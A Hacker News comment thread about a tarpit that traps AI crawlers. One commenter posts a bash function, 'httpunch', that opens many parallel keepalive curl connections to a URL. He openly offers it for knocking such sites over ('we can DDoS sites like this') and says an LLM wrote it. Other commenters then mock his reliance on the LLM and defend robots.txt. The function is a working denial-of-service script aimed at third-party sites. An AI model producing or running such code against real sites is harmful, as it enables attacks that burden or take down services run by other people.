← Back to context

Comment by pmarreck

1 day ago

It's not. It's rather pointless and frankly, nearsighted. And we can DDoS sites like this just as offensively as well simply by making many requests to it since its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even 1 person to make many requests to it. Just expensive to host. So feel free to use this bash function to defeat these:

    httpunch() {
      local url=$1
      local connections=${2:-${HTTPUNCH_CONNECTIONS:-100}}
      local action=$1
      local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
      local silent_mode=false

      # Check if "kill" was passed as the first argument
      if [[ $action == "kill" ]]; then
        echo "Killing all curl processes..."
        pkill -f "curl --no-buffer"
        return
      fi

      # Parse optional --silent argument
      for arg in "$@"; do
        if [[ $arg == "--silent" ]]; then
          silent_mode=true
          break
        fi
      done

      # Ensure URL is provided if "kill" is not used
      if [[ -z $url ]]; then
        echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
        echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
        return 1
      fi

      echo "Starting $connections connections to $url..."
      for ((i = 1; i <= connections; i++)); do
        if $silent_mode; then
          curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
        else
          curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
        fi
      done

      echo "$connections connections started with a keepalive time of $keepalive_time seconds."
      echo "Use 'httpunch kill' to terminate them."
    }

(Generated in a few seconds with the help of an LLM of course.) Your free speech is also my free speech. LLM's are just a very useful tool, and Llama for example is open-source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk-anticorporate AI-doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.

The tarpit is made for LLM crawlers who don't respect robots.txt. Do you love LLMs so much that you wish that they wouldn't have to respect this stupid, anticorporate AI-doomer robots.txt convention so they can pry out of the greedy hands of the webserver one more URL?

Maybe you just had a knee-jerk reaction.

You called the parent unintelligent yet need an LLM to show you how to run curl in a loop. Yikes.

  • Your assumption that I couldn't have written this myself or that I didn't make corrections to it is telling. I've only been doing dev for 30+ years lol

    LLMs are an accelerant, like all previous tools... Not a replacement, although it seems most people still need to figure that out for themselves while I already have

    • Sure, but in this case it's like driving your car 10 feet to your mailbox and then bragging about how it's an accelerant (in other words, the task wasn't remotely difficult to begin with and doesn't really warrant "accelerating"). I assume in this case your note about how it was written with an LLM was more just to spite the anti-LLM sentiment above though, which would make more sense.

      1 reply →